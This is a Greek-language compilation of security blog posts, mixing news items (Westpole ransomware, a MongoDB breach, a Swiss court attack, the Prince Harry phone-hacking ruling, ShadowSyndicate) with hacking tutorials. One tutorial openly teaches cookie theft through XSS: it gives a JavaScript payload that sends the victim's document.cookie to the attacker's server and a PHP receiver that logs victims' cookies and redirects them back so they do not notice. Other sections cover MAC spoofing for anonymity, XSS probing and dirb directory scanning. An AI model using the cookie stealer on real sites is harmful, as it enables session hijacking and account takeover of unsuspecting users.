Στις 8 Δεκεμβρίου 2023, η ιταλική εταιρεία παροχής υπηρεσιών cloud, Westpole, έπεσε θύμα κυβερνοεπίθεσης ransomware, με επιπτώσεις στην πελάτισσά της, την PA Digitale, που παρέχει ψηφιακές υπηρεσίες σε δημόσιους φορείς. Η επίθεση, με την παραλλαγή Lockbit 3.0, παρέλυσε υπηρεσίες πολλών δήμων και άλλων οντοτήτων. Η Westpole ενημέρωσε τις αρχές και έναν επόπτη προστασίας δεδομένων.
Η εταιρεία προσπαθεί να ανακτήσει τα δεδομένα μετά την επίθεση, αλλά η έκταση των ζημιών παραμένει αβέβαιη. Πολλοί δήμοι επηρεάστηκαν, αναγκάζοντας τους να επιστρέψουν σε χειροκίνητες λειτουργίες. Η ιταλική κυβερνοασφάλεια προσπαθεί να ανακτήσει τα δεδομένα.
Ο πάροχος υπηρεσιών cloud διαβεβαίωσε ότι δεν υπήρξε διαρροή δεδομένων, αλλά οι επιπτώσεις είναι ανησυχητικές. Η επίθεση χαρακτηρίζεται ως η πιο σοβαρή που έχει πλήξει την ιταλική δημόσια διοίκηση.
Για την αντιμετώπιση τέτοιων επιθέσεων, συνιστάται εκπαίδευση των χρηστών, εγκατάσταση ενημερωμένου λογισμικού antivirus, διατήρηση ενημερωμένου λειτουργικού συστήματος, τακτικά αντίγραφα ασφαλείας και προσοχή στις λήψεις και τη χρήση αναθέσεων.
Η αστυνομία του Λονδίνου δήλωσε ότι θα “εξετάσει προσεκτικά” τα ευρήματα μιας δικαστικής απόφασης που κατέληξε στο συμπέρασμα ότι ο Πρίγκιπας Χάρι ήταν θύμα υποκλοπής τηλεφώνου και άλλων παράνομων πράξεων από δημοσιογράφους της Mirror Group με τη γνώση των συντακτών τους.
Ο νεότερος γιος του Βασιλιά Κάρολου, που έγινε ο πρώτος υψηλόβαθμος βρετανικός βασιλικός μετά από 130 χρόνια που παρευρίσκεται ως μάρτυρας σε δικαστήριο, ανταμείφθηκε με 140.600 λίρες (178.000 δολάρια) την Παρασκευή, μετά τη συμφωνία του δικαστή ότι είχε πέσει θύμα δημοσιογράφων που εργάζονταν για την Mirror Group Newspapers.
Μια εκπρόσωπος της αστυνομίας του Λονδίνου δήλωσε ότι θα “εξετάσει προσεκτικά” την απόφαση στην αστική υπόθεση, προσθέτοντας: “Δεν υπάρχει ενεργή έρευνα.”
Αφότου αποχώρησε από τα βασιλικά καθήκοντα το 2020 και μετακόμισε στην Καλιφόρνια με την αμερικανίδα σύζυγό του Μέγκαν, ο Δούκας του Σάσεξ έχει καθιερώσει ως αποστολή του να απαλλάξει το βρετανικό τύπο από αυτούς που κατηγορεί ως “εγκληματίες που προσποιούνται δημοσιογράφους”, ειδικά υψηλόβαθμους εκτελεστικούς και συντάκτες.
Η απόφαση του δικαστηρίου ανέφερε ότι ανάμεσα στους συντάκτες που γνώριζαν για τη “εκτεταμένη” παράνομη συμπεριφορά ήταν ο γνωστός δημοσιογράφος Piers Morgan, συντάκτης της Daily Mirror από το 1996 έως το 2004, ο οποίος έχει γίνει ένθερμος κριτικός του Χάρι και της Μέγκαν.
Ο Morgan αρνήθηκε επί μακρόν ότι γνώριζε για την υποκλοπή τηλεφώνου κατά τη διάρκεια της θητείας του ως συντάκτης.
(Σημείωση: Οι συναλλαγματικές ισοτιμίες αναφέρονται στο κείμενο με το σύμβολο $1 = 0,7890 λίρες.)
Η εταιρεία λογισμικού βάσης δεδομένων MongoDB αποκάλυψε ότι έχει πέσει θύμα κακόβουλης επίθεσης στα εταιρικά της συστήματα, προειδοποιώντας ότι στα κλεμμένα δεδομένα περιλαμβάνονται στοιχεία μεταδεδομένων λογαριασμού πελατών και πληροφορίες επικοινωνίας.
Σε μια σύντομη ανακοίνωση που δημοσιεύτηκε το περασμένο Σαββατοκύριακο, η εταιρεία με έδρα τη Νέα Υόρκη αναφέρει ότι ανιχνεύτηκε “ύποπτη δραστηριότητα” στο δίκτυό της στις 13 Δεκεμβρίου και αργότερα επιβεβαίωσε ότι οι χάκερ κατόρθωσαν να διεισδύσουν στα συστήματά της “πριν από την ανίχνευση για κάποιο χρονικό διάστημα.”
Η εταιρεία δεν παρείχε περαιτέρω λεπτομέρειες σχετικά με την παραβίαση.
Σε ανακοίνωση προς τους πελάτες, η MongoDB, Lena Smart, δήλωσε ότι η εταιρεία δεν έχει ενημερωθεί για εκθέσεις δεδομένων που οι πελάτες αποθηκεύουν στο κορυφαίο προϊόν της, το MongoDB Atlas.
“Παρ’ όλα αυτά, συνιστούμε στους πελάτες να παραμείνουν επιφυλακτικοί έναντι επιθέσεων κοινωνικής μηχανικής και ψαρέματος, να ενεργοποιήσουν την πολυπαραμετρική πιστοποίηση αντιμετώπισης του ψαρέματος και να αλλάζουν τα κωδικούς τους στο MongoDB Atlas τακτικά,” επεσήμανε η Smart.
Ένα δικαστικό σύστημα στην Ελβετία ανακοίνωσε την Τρίτη ότι έχει πληγεί από μια κυβερνοεπίθεση.
Το δικαστήριο, που βρίσκεται στη γερμανόφωνη περιοχή του Μαρτς στην κεντρική Ελβετία, εξυπηρετεί περίπου 45.000 άτομα.
Αν και η φύση της επίθεσης δεν έχει αποκαλυφθεί πλήρως, μια περιορισμένη περιγραφή στην ιστοσελίδα του δικαστηρίου υποδεικνύει ότι πιθανότατα πρόκειται για μια επίθεση ransomware. “Κλείσαμε προσωρινά ολόκληρο το πληροφορικό σύστημα για να προστατέψουμε τα δεδομένα. Προς το παρόν, δεν υπάρχει σαφής χρονικός ορίζοντας για την επαναφορά του, αλλά η διαδικασία μπορεί να διαρκέσει αρκετές ημέρες”, αναφέρει η ιστοσελίδα.
Οι τηλεφωνικές γραμμές του δικαστηρίου είναι προσωρινά εκτός λειτουργίας, αλλά προγραμματισμένες ακροάσεις αναμένεται να πραγματοποιηθούν σύμφωνα με το πρόγραμμα.
Αυτή η κυβερνοεπίθεση ακολουθεί μια παρόμοια επίθεση ransomware στη δημοτική διοίκηση του Zollikofen, προαστίου της Βέρνης, τον Νοέμβριο.
Σύμφωνα με την ελβετική εφημερίδα Inside IT, οι επιτιθέμενοι κρυπτογράφησαν τα δεδομένα διαχείρισης κατά τη διάρκεια της επίθεσης, με τις αρχές να αποσυνδέουν τα δίκτυα ως προληπτικό μέτρο.
Η κυβερνοεπίθεση μπορεί να έχει σοβαρές συνέπειες στη λειτουργία του δικαστικού συστήματος. Η διακοπή της πρόσβασης σε σημαντικά δεδομένα και αρχεία μπορεί να απειλήσει την ακεραιότητα των πληροφοριών και να δυσκολέψει την απονομή δικαιοσύνης. Αυτό μπορεί να οδηγήσει σε καθυστερήσεις ή ακόμη και ακυρώσεις δικαστικών διαδικασιών, με σοβαρές επιπτώσεις για τη δικαιοσύνη και την εμπιστοσύνη του κοινού.
Επιπλέον, μια κυβερνοεπίθεση μπορεί να προκαλέσει τη διαρροή ευαίσθητων πληροφοριών, θέτοντας σε κίνδυνο την ιδιωτικότητα και την ασφάλεια των ατόμων που συμμετέχουν σε δικαστικές διαδικασίες, με σοβαρές επιπτώσεις για τους ενδιαφερόμενους.
Επιστήμονες έχουν εκδώσει προειδοποίηση προς τους χρήστες των υπηρεσιών ηλεκτρονικού ταχυδρομείου, όπως Gmail και Outlook, καθώς αναμένεται να αυξηθεί ο όγκος των απάτες μέσω email κατά τη διάρκεια των Χριστουγέννων. Μετά από εβδομάδες online αγορών και προσοχή στις επερχόμενες εκπτώσεις, οι ευκαιρίες για κυβερνοεπιθέσεις μέσω ηλεκτρονικού ταχυδρομείου αυξάνονται.
Σύμφωνα με την Vonny Gamot, Υπεύθυνη της ΕΜΕΑ στην McAfee, κυβερνοεγκληματίες χρησιμοποιούν απάτες μέσω ηλεκτρονικού ταχυδρομείου ή ψεύτικες ιστοσελίδες για να παρασύρουν ανθρώπους. Με την προβλεπόμενη εμφάνιση 10 εκατομμυρίων επιπλέον διαδικτυακών απειλών κατά την περίοδο των Χριστουγέννων, είναι σημαντικό να είμαστε επιφυλακτικοί με γορτινές προσφορές και ενημερώσεις παραγγελίας.
Η εταιρεία McAfee προειδοποιεί ότι αν κάτι φαίνεται υπερβολικά καλό για να είναι αληθινό, πιθανότατα δεν είναι. Κατά τη διάρκεια των Χριστουγέννων, οι απάτες μέσω email ή απάτες παράδοσης γίνονται πιο επικίνδυνες. Είναι σημαντικό να επιβεβαιώνετε τις πληροφορίες πριν από κλικ σε συνδέσμους ή ανοίγματος συνημμένων σε emails.
Για προστασία από απάτες μέσω email, αποφύγετε να ανοίξετε ανεπιθύμητα emails ή να κάνετε κλικ σε ύποπτου περιεχομένου συνδέσμους. Προσέξτε επίσης τις προσπάθειες phishing που ζητούν προσωπικές πληροφορίες. Χρησιμοποιήστε ισχυρούς κωδικούς πρόσβασης και ενημερώνετε τους περιοδικά. Τέλος, εγκαταστήστε και ενημερώστε το λογισμικό ασφαλείας στη συσκευή σας για αποτροπή απατών μέσω ηλεκτρονικού ταχυδρομείου.
Η Κίνα ανακοίνωσε ότι εντόπισε λογισμικό γεωγραφικών πληροφοριών από άλλες χώρες που ενδέχεται να θέτει σε κίνδυνο εμπιστευτικά και ευαίσθητα δεδομένα σε κλάδους κλειδιά, συμπεριλαμβανομένου του στρατιωτικού, και προειδοποίησε τα τμήματα ασφαλείας να πραγματοποιήσουν εμπεριστατωμένους ελέγχους για να περιορίσουν περαιτέρω επιθέσεις.
Το Υπουργείο Κρατικής Ασφαλείας ανέφερε ότι μια εκτενής έρευνα ανέδειξε ότι ξένο λογισμικό συστημάτων γεωγραφικών πληροφοριών χρησιμοποιείται για τη συλλογή δεδομένων – κάποια από αυτά αφορούν κρατικά μυστικά – “αποτελεί σοβαρή απειλή για την εθνική ασφάλεια της Κίνας.”
Η κυβέρνηση αποκάλυψε τον κίνδυνο σε άρθρο στο δημόσιο λογαριασμό της στο WeChat τη Δευτέρα, αλλά δεν διακρίνει καμία πληροφορία για επιχειρήσεις που κατηγορούνται για πρόσβαση στα δεδομένα ή προσδιορίζει συγκεκριμένες κινεζικές εταιρείες που επηρεάστηκαν ή στοχεύτηκαν.
Η Κίνα ανέφερε ότι οι υπεύθυνοι χρησιμοποιούν λογισμικό για τη συλλογή δεδομένων χρηστών χωρίς περιορισμούς, τοποθετώντας εσκεμμένα προεγκατεστημένα “πίσω παράθυρα” στο λογισμικό για να επιτραπεί η κυβερνοεπίθεση και η κλοπή δεδομένων.
Η κυβέρνηση ανέφερε ότι με την κλοπή δεδομένων υψηλής ακρίβειας γεωγραφικών πληροφοριών, η τρισδιάστατη γεωμορφολογική απεικόνιση συγκεκριμένων περιοχών στους τομείς των μεταφορών, της ενέργειας, του στρατιωτικού και άλλων σημαντικών τομέων μπορεί να είναι εκτεθειμένη σε απειλές.
Η Κίνα έχει λάβει αυξανόμενα μέτρα για την προστασία της εθνικής της ασφάλειας και την πρόληψη διαρροών πληροφοριών που θα μπορούσαν να πληγώσουν τους κλάδους και να βλάψουν την οικονομία της.
Η κυβέρνηση ανέφερε ότι τα τμήματα πρέπει να πραγματοποιήσουν έρευνες για τους κινδύνους ασφάλειας δεδομένων γεωγραφικών πληροφοριών, “και να διορθώσουν και να εξαλείψουν άμεσα” οποιαδήποτε απειλή.
Στον παρακάτω κώδικα θα δείτε πως μπορείτε να κλέψετε cookies κάνοντας επιθέσεις xss.
Ας ρίξουμε μια ματιά στο πρώτο script. Αυτό είναι το script/κώδικας που κάνετε inject στην σελίδα και το στέλνετε στο θύμα σας…
<script>
var server="192.168.1.6"; //your server var phpfl= "recvCookie.php"; //your php file to reiceve the cookie var getArg="data"; //the argument that will handle the data var path = "http://"+server+"/"+phpfl+"?"+getArg+"="+document.cookie;
window.open(path,"_self");
</script>
Το <script> λέει στον browser του θύματος ότι ο παρακάτω κώδικας είναι της γλώσσας javascript και το </script> δείχνει στον browser που τελειώνει αυτός ο κώδικας.
Οι επόμενες τέσσερις γραμμές είναι δικές μας μεταβλητές για να μπορούμε να μην τα έχουμε όλα μπερδεμένα…
Η πρώτη μεταβλητή είναι ο δικός μας server ο όποιος θα δέχεται τα δεδομένα των cookies από τους χρήστες που θα ανοίγουν τον παραπάνω κώδικα στον browser τους.
Η δεύτερή γραμμή δείχνει που είναι το αρχείο που θα επεξεργάζεται τα δεδομένα των cookies και θα τα γράφει σε κάποιο αρχείο για να μπορούμε να τα δούμε εμείς αργότερα…
Η τρίτη γραμμή είναι το argument που θα σταλθούν τα δεδομένα. Για να το περιγράψω με τον απλό τρόπο. Είναι η μεταβλητή στον σερβερ μας. Εκεί θα πάνε τα δεδομένα πριν τα γράψουμε σε κάποιο αρχείο.
Η τελευταία μεταβλητή το μόνο που κάνει είναι να τα ενώνει όλα μαζί.
βάζει αρχικά το http:// μπροστά. ακολουθεί η διεύθυνση του server μας. Το αρχείο κλπ… μέχρι που στο τέλος υπάρχει και το document.cookie. Αυτό διαβάζει τα δεδομένα για τα cookies που είναι στον browser του θύματος.
Το αποτέλεσμά αυτής της μεταβλητής θα μοιάζει κάπως έτσι:
path=http://myserver.com?recvCookie.php?data=[Dedomena twn cookies edw]
Και έχουμε μια ακόμα εντολή… Αυτή η εντολή κάνει redirect το θύμα μας στον server μας και μάλιστα στο path…. Τα υπόλοιπα τα αναλαμβάνει το php αρχείο το όποιο είναι στον δικό μας server!
<?php $target_site = "http://192.168.1.6"; //redirect back the user! //http/https is required date_default_timezone_set("UTC"); $fl = fopen("data_logs.html","a");
Το <?php λέει στον server μας ότι ο παρακάτω κώδικας έχει γραφτεί σε γλώσσα php. To ?> λέει ότι εκεί τελειώνει ο παραπάνω κώδικας που ήταν σε php
$target_site είναι μια μεταβλητή που αποθηκεύει το site που έχουμε χακαρεί. Αυτό το αποθηκεύουμε εκεί για να κάνουμε redirect το θύμα μας πίσω στο κανονικό site όταν τσιμπήσει, με αυτόν τον τρόπο δεν θα καταλάβει καν τι έγινε (αν είναι άσχετος)
date_default_timezone_set(“UTC”);
κάνει ακριβώς αυτό που λέει :p Θα το χρειαστούμε για να ξέρουμε τι ώρα τσίμπησε το θύμα μας. Μπορείτε να το αλλάξετε να είναι στην Έλλαδα. Αντί για UTC βάλτε greece
$fl = fopen(“data_logs.html”,”a”);
Αυτή η εντολή ανοίγει ένα αρχείο με το όνομα data_logs.html. Αν δεν υπάρχει το δημιουργεί. Αν υπάρχει τότε πηγαίνει τον κέρσορα στο τέλος του αρχείου. Με αυτόν τον τρόπο δεν διαγράφονται δεδομένα από προηγούμενα θύματα. Για να γράψουμε κάτι σε αυτό το αρχείο το κάνουμε με την fopen. To $fl βάζει τα πράγματα στο αρχείο… δεν είναι μεταβλητή (όχι με την έννοια τις μεταβλητής βασικά)
$data = $_GET[“data”];
Αυτό δεν χρειαζόταν… Αλλά ας έχουμε τα πράγματα τακτοποιημένα… Αυτό εδώ πηγαίνει τα δεδομένα από την μεταβλητή (argument) data στην μεταβλητή $data.
$_GET[“data”];
Αυτό εδώ έχει τα δεδομένα που έστειλε το προηγούμενο script. Για να μην το καλούμε όλο αυτό τα βάλαμε στην μεταβλητή $data…
Η πρώτη γραμμή γράφει στο αρχείο ένα html tag το όποιο λέει να τυπώνει τα δεδομένα όπως ακριβώς του τα δίνουμε (με χαρακτήρες νέας γραμμής κλπ)
Η δεύτερή γραμμή γράφει στο αρχείο την ημερομηνία και την ώρα που το θύμα μας στάλθηκε σε αυτό το αρχείο από τον κώδικα μας.
Η τρίτη γραμμή γράφει στο αρχείο τα δεδομένα που έστειλε ο κώδικας που εκτελέστηκε στον υπολογιστή του θύματος (δηλαδή τα cookies)
H τέταρτη γραμμή γράφει:,”————————-” για να ξέρουμε που τελειώνουν τα δεδομένα. Το \n είναι χαρακτήρας νέας γραμμής, είναι σαν να πατάω enter σε ένα έγγραφό κειμένου δηλαδή.
header("Location: ".$target_site); die();
η πρώτη γραμμή κάνει redirect τον χρήστη μας πίσω στην σελίδα που χακάραμε, με αυτόν τον τρόπο κάνουμε λίγο καμουφλάζ στην επίθεση και δεν καταλαβαίνει κάτι…
die()
σταματάει να εκτελεί κώδικα php στον server. Δεν είναι απαραίτητο εδώ. Αλλά αν υπάρξει θέμα (πχ δεν μπορεί να γράψει τα δεδομένα στο αρχείο και καθυστέρηση πολύ να τελειώσει το θύμα μας μπορεί να καταλάβει ότι κάνουμε επίθεση. το die σταματάει αυτήν την διαδικασία… και το redirect γίνετε κανονικά)
Αλλαγή Διεύθυνσης MAC με το Macchanger στο Kali Linux
Το Macchanger στο Kali Linux αποτελεί ένα ισχυρό εργαλείο που επιτρέπει στους χρήστες να αλλάξουν τη διεύθυνση MAC της δικτυακής τους κάρτας, προσθέτοντας ένα επιπλέον επίπεδο ανωνυμίας στις διαδικασίες τους.
Σε αυτό το άρθρο, θα εξετάσουμε πώς να χρησιμοποιήσετε αποτελεσματικά το Macchanger στο Kali Linux, ενισχύοντας την ανωνυμία σας στο δίκτυο.
Η διεύθυνση MAC (Media Access Control) είναι ένα μοναδικό αναγνωριστικό που ανατίθεται σε κάθε δικτυακή συσκευή. Χρησιμοποιείται για τον αναγνωρισμό και την επικοινωνία στο δίκτυο.
Η αλλαγή της διεύθυνσης MAC με το Macchanger επιτρέπει στους χρήστες να τροποποιήσουν αυτό το αναγνωριστικό, έχοντας παραπάνω ανωμία.
Οδηγίες Χρήσης του Macchanger στο Kali Linux
Άνοιγμα Τερματικού:
Εκτέλεση του Macchanger:
sudo macchanger -r [Όνομα Δικτυακής Κάρτας]
Για παράδειγμα:
sudo macchanger -r eth0
Το [Όνομα δικτυακής κάρτας] αναφέρεται στο όνομα της δικτυακής σας κάρτας, π.χ., eth0 ή wlan0.
Για επαναφορά της πραγματικής διεύθυνσης MAC
sudo macchanger -p [Όνομα Δικτυακής Κάρτας]
Για να βρείτε το όνομα της κάρτας Wi-Fi στο Kali Linux, μπορείτε να χρησιμοποιήσετε την εντολή iwconfig ή την εντολή ifconfig. Αυτές οι εντολές εμφανίζουν πληροφορίες σχετικά με τις διαθέσιμες δικτυακές συσκευές, συμπεριλαμβανομένων των ασύρματων.
Εκτελέστε τις παρακάτω εντολές στο τερματικό:
iwconfig
Θα δείτε μια λίστα με τις ασύρματες δικτυακές συσκευές, και το όνομα της κάρτας Wi-Fi θα εμφανίζεται στην αρχή της κάθε εγγραφής.
Χρησιμοποιώντας το
ifconfig
Θα δείτε μια λίστα με όλες τις δικτυακές συσκευές. Η κάρτα Wi-Fi θα είναι συνήθως με τη μορφή wlanX, όπου X είναι ένας αριθμός.
Το XSS (Cross-Site Scripting) είναι μια επίθεση κατά της ασφάλειας των ιστοσελίδων, κατά την οποία ο επιτιθέμενος ενσωματώνει κακόβουλο κώδικα (συνήθως JavaScript) σε μια ιστοσελίδα που ανοίγει σε έναν web browser. Ο κακόβουλος κώδικας εκτελείται στον browser του θύματος, όχι στον διακομιστή, και μπορεί να έχει πολλές επιπτώσεις, συμπεριλαμβανομένης της κλοπής δεδομένων χρηστών, όπως cookies ή συνόδους, την αλλοίωση του περιεχομένου της ιστοσελίδας ή την εκτέλεση επιπλέον επιθέσεων σε βάρος των χρηστών.
Οι βασικές μορφές του XSS περιλαμβάνουν:
Stored XSS (Αποθηκευμένο XSS): Όπου ο κακόβουλος κώδικας αποθηκεύεται στη βάση δεδομένων ή σε ένα αρχείο, και εκτελείται κάθε φορά που ο χρήστης ζητάει να δει τη σελίδα.
Reflected XSS (Ανακλιμένο XSS): Όπου ο κακόβουλος κώδικας περνά από τον browser του θύματος μέσω μιας επικίνδυνης URL ή ενός παραμέτρου σε μια σελίδα.
DOM-based XSS (DOM XSS): Όπου ο κακόβουλος κώδικας τροποποιεί το Document Object Model (DOM) στον browser του θύματος, και η επίθεση εκτελείται κατά την προβολή της σελίδας.
Blind XSS: Όπου ο κακόβουλος κώδικας εκτελείται χωρίς να αφήνει άμεσα αντίδραση στον browser του θύματος. Ο επιτιθέμενος δεν βλέπει την έξοδο, αλλά μπορεί να συλλέγει δεδομένα.
Non-persistent XSS: Όπου ο κακόβουλος κώδικας δεν αποθηκεύεται, αλλά παραδίδεται στο θύμα μέσω κακόβουλων συνδέσμων ή μηνυμάτων. Εκτελείται κατά την προβολή της σελίδας.
Το Cross-Site Scripting (XSS) λειτουργεί με τον εξής τρόπο:
Ενσωμάτωση κακόβουλου κώδικα: Ο επιτιθέμενος ενσωματώνει κακόβουλο κώδικα (συνήθως JavaScript) σε μια ιστοσελίδα, συχνά μέσω εισόδων χρήστη όπως φόρμες, παραμέτρους URL ή σχόλια.
Αποστολή της σελίδας προς το θύμα: Η τροποποιημένη σελίδα στέλνεται στο θύμα, συχνά μέσω κακόβουλων συνδέσμων ή ηλεκτρονικών μηνυμάτων.
Εκτέλεση του κακόβουλου κώδικα: Ο κακόβουλος κώδικας εκτελείται στον web browser του θύματος κατά την προβολή της τροποποιημένης σελίδας. Αυτό συμβαίνει επειδή ο browser εκτελεί όλο τον JavaScript που βρίσκεται στο περιεχόμενο της σελίδας.
Κλοπή δεδομένων ή επιθέσεις: Ο κακόβουλος κώδικας μπορεί να προκαλέσει πολλά διαφορετικά προβλήματα, όπως την κλοπή των cookies σύνδεσης του χρήστη, την αποστολή αιτημάτων εξ’ αποστάσεως εξ ονόματος του χρήστη, την αλλοίωση του περιεχομένου της σελίδας, την απόκτηση προσωπικών πληροφοριών, και πολλά άλλα.
Ο κίνδυνος με το XSS είναι ότι ο κακόβουλος κώδικας εκτελείται με τα δικαιώματα του χρήστη στον browser του, και αυτό μπορεί να έχει επιπτώσεις σε προσωπικά δεδομένα, ευαίσθητες πληροφορίες και την ασφάλεια της σελίδας.
Υπάρχουν διάφορα εργαλεία που μπορείτε να χρησιμοποιήσετε για την εντοπισμό και τον έλεγχο των ευπαθειών Cross-Site Scripting (XSS) σε ιστοσελίδες και εφαρμογές. Αυτά τα εργαλεία σάρωσης και ελέγχου ασφάλειας μπορούν να σας βοηθήσουν να εντοπίσετε και να αποτρέψετε επιθέσεις XSS. Εδώ είναι μερικά από αυτά:
OWASP Zed Attack Proxy (ZAP): Το OWASP ZAP είναι ένα ανοιχτού κώδικα εργαλείο εξερεύνησης ασφαλείας που προσφέρει ανίχνευση και αντιμετώπιση των ευπαθειών XSS, μεταξύ άλλων.
Burp Suite: Το Burp Suite είναι ένα εργαλείο συναχωσίνωσης και ασφαλείας που μπορεί να χρησιμοποιηθεί για τον έλεγχο της ασφάλειας εφαρμογών, συμπεριλαμβανομένης της ανίχνευσης ευπαθειών XSS.
Vega: Το Vega είναι ένα ανοιχτού κώδικα εργαλείο ασφαλείας που μπορεί να χρησιμοποιηθεί για τον έλεγχο της ασφάλειας των ιστοσελίδων και την ανίχνευση ευπαθειών XSS.
Για παράδειγμα. Αν πάτε στην σελίδα http://testphp.vulnweb.com/ (έχει δημιουργηθεί για να εξασκούνται οι νέοι σε θέματα ασφάλειας ) και αναζητήσετε κάτι παράξενο όπως αδσαδσδσζψσσαδσα θα σας εμφανίσει το παρακάτω μήνυμα
searched for: αδσαδσδσζψσσαδσα
Παρατηρούμε δηλαδή ότι το μήνυμα που πληκτρολογήσαμε εμφανίστηκε στην ιστοσελίδα. Τώρα αν αντικαταστήσουμε αυτό το μήνυμα με κώδικα μπορούμε να πετύχουμε πολύ διαφορετικά αποτελέσματα για παράδειγμα αν γράψουμε
<script>alert("This site is vulnerable to xss")</script>
Τότε θα παρατηρήσουμε ότι ο κώδικας μας εκτελείτε και έτσι μπορούμε να πετύχουμε αποτελέσματα που δεν είχαν προβλεφθεί από τους δημιουργούς του site
Όπως ανέφερα δεν χρησιμοποιείται τόσο για επίθεση στην σελίδα όσο για τους χρήστες που υπάρχουν σε αυτήν.
Πως όμως μπορεί αυτός ο τρόπος να βλάψει τους απλούς χρήστες?
Λοιπόν ο επιτιθέμενος έχει την επιλογή να στείλει το url που περιέχει την ευπάθεια σε άλλους χρήστες που χρησιμοποιούν αυτήν την σελίδα και ο κώδικας θα εκτελεστή στον υπολογιστή τους. Στην σελίδα που κοιτάμε εμείς δεν είναι ορατή η μεταβλητή που περιέχει τα δεδομένα που πληκτρολογήσαμε. Αρά ο επιτιθέμενος σε αυτήν την περίπτωση θα έβλεπε μέσο προγραμμάτων η κώδικα τι μεταβλητές υπάρχουν στο url 🙂
και θα έβρισκε ότι μπορούσε να στείλει κάτι τέτοιο στο θύμα του. (Δεν δουλεύει στην περίπτωση μας)
testphp.vulnweb.com/search.php?test=query&searchFor=<script>alert("this site is vulnerable to xss")</script>
Αυτό όμως φαίνεται ότι είναι πειραγμένο και ο χρήστης θα μπορούσε να το καταλάβει εύκολα. Αν όμως το κωδικοποιούσαμε ? ο χρήστης θα έβλεπε κάτι τέτοιο στο facebook/skype κλπ
testphp.vulnweb.com/search.php?test=query&searchFor=<script>alert("Test")</script></script>
Δεν θα έμπαινε στον κόπο να το αποκρυπτογραφήσει και απλά θα το άνοιγε για να δει τη είναι.
Ένας άλλος τρόπος είναι να βρει ευπάθεια σε πράγματα που μένουν για πάντα στο site. πχ σε ένα φόρουμ. Θα μπορούσε να κάνει xss σε κάποιο ποστ και έτσι θα έπεφταν στην παγίδα όλοι όσοι άνοιγαν το θέμα για να το δουν.
Φυσικά δεν θα ήταν τέτοιες εντολές. Η γλώσσα η οποία χρησιμοποιήσαμε λέγετε javascript… Ένας από τους λόγους είναι πως η γλώσσα είναι πιο πλούσια από την html και δίνει την δυνατότητα στον επιτιθέμενο να κλέψει τα cookies και να τα εκμεταλλευτή για να βρει τον κωδικό κάποιου χρήστη
Χρησιμοποιώντας το Dirb για εντοπισμό κρυφών φακέλων και αρχείων σε ιστότοπους
Το Dirb είναι ένα εργαλείο ανοικτού κώδικα για την εξερεύνηση καταλόγων σε ιστότοπους. Πρόκειται για ένα εργαλείο σάρωσης καταλόγων (directory scanner) που χρησιμοποιείται συνήθως για τεστ ασφαλείας σε ιστότοπους.
Οι κυριότερες λειτουργίες του Dirb περιλαμβάνουν την ανίχνευση κρυμμένων καταλόγων και την εντοπισμό ανοικτών αρχείων. Χρησιμοποιεί λίστες κοινών ονομάτων αρχείων και καταλόγων για να δοκιμάσει την ύπαρξή τους σε έναν συγκεκριμένο ιστότοπο.
Εγκατάσταση του Dirb:
Καταρχάς, θα πρέπει να εγκαταστήσετε το Dirb.
Ανάλογα με το λειτουργικό σας σύστημα, ο τρόπος εγκατάστασης μπορεί να διαφέρει. Για παράδειγμα, σε συστήματα Debian/Ubuntu, μπορείτε να χρησιμοποιήσετε την εντολή:
sudo apt-get install dirb
Kali Linux
Στο Kali Linux, το εργαλείο Dirb συνήθως είναι προεγκατεστημένο.
Μπορείτε να το εκτελέσετε απευθείας από το τερματικό χρησιμοποιώντας την εντολή dirb.
Χρήση του Dirb:
Αφού εγκατασταθεί, μπορείτε να το χρησιμοποιήσετε για την εξερεύνηση ενός ιστότοπου ως εξής:
dirb http://example.com
Αυτή η εντολή θα αρχίσει μια σάρωση καταλόγων στον ιστότοπο http://example.com. Το Dirb θα χρησιμοποιήσει μια λίστα συνηθισμένων ονομάτων αρχείων και καταλόγων για να ελέγξει αν υπάρχουν προσβάσιμες διαδρομές.
Μπορείτε να προσαρμόσετε την εντολή ανάλογα με τις ανάγκες σας, π.χ.:
dirb http://example.com -o output.txt -r
-o output.txt: Αποθηκεύει τα αποτελέσματα σε ένα αρχείο κειμένου.
-r: Επαναλαμβάνει τον έλεγχο για υπάρχοντα subdirectories.
Χρήση WordList
Αν θέλετε να χρησιμοποιήσετε μια δική σας λίστα, μπορείτε να την περάσετε στο Dirb με την επιλογή -w. Για παράδειγμα:
Αν δεν καθορίσετε μια συγκεκριμένη λίστα, το Dirb θα χρησιμοποιήσει την ενσωματωμένη λίστα που έχει προκαθορισμένα.
Σε γενικές γραμμές, οι λίστες για εξερεύνηση καταλόγων περιλαμβάνουν συνηθισμένα ονόματα αρχείων (όπως index.html, admin.php, κλπ.) και γνωστά ονόματα καταλόγων (όπως admin/, images/, κλπ.).
Αν θέλετε να χρησιμοποιήσετε πολλαπλές wordlists με το Dirb, μπορείτε να το κάνετε παρέχοντας τα ονόματα αρχείων των wordlists ως επιπλέον παραμέτρους. Οι λίστες θα πρέπει να έχουν ένα όνομα αρχείου αντίστοιχο με το Dirb και πρέπει να βρίσκονται στον ίδιο κατάλογο ή να παρέχεται ο πλήρης διαδρομή.
Παράδειγμα:
dirb http://example.com -w wordlist1.txt -w wordlist2.txt Σε αυτό το παράδειγμα, το Dirb θα χρησιμοποιήσει τις λίστες wordlist1.txt και wordlist2.txt για την εξερεύνηση του ιστότοπου.
Αναζήτηση Συγκεκριμένων αρχείων σε μια ιστοσελίδα
Μμπορείτε να χρησιμοποιήσετε την επιλογή -X.
Παράδειγμα:
dirb http://example.com -X .php,.html,.txt
Σε αυτό το παράδειγμα, το Dirb θα εξερευνήσει τον ιστότοπο για αρχεία με κατάληξη .php, .html και .txt.
Μπορείτε να προσθέσετε ή να αφαιρέσετε καταλήξεις ανάλογα με τις ανάγκες σας.
Οι ShadowSyndicate χάκερ συνδέονται με πολλαπλές επιθέσεις ransomware
Οι ερευνητές ασφαλείας εντόπισαν υποδομές που ανήκουν σε έναν απειλητικό παράγοντα που τώρα εντοπίζεται ως ShadowSyndicate, ο οποίος πιθανότατα χρησιμοποίησε επτά διαφορετικές οικογένειες ransomware σε επιθέσεις κατά το περασμένο έτος.
Οι αναλυτές της Group-IB που συνεργάζονται με την Bridewell και τον ανεξάρτητο ερευνητή Michael Koczwara αποδίδουν με διάφορους βαθμούς εμπιστοσύνης τη χρήση από το ShadowSyndicate των ransomware Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus και Play σε πολλαπλές παραβιάσεις που παρατηρήθηκαν από τον Ιούλιο του 2022.
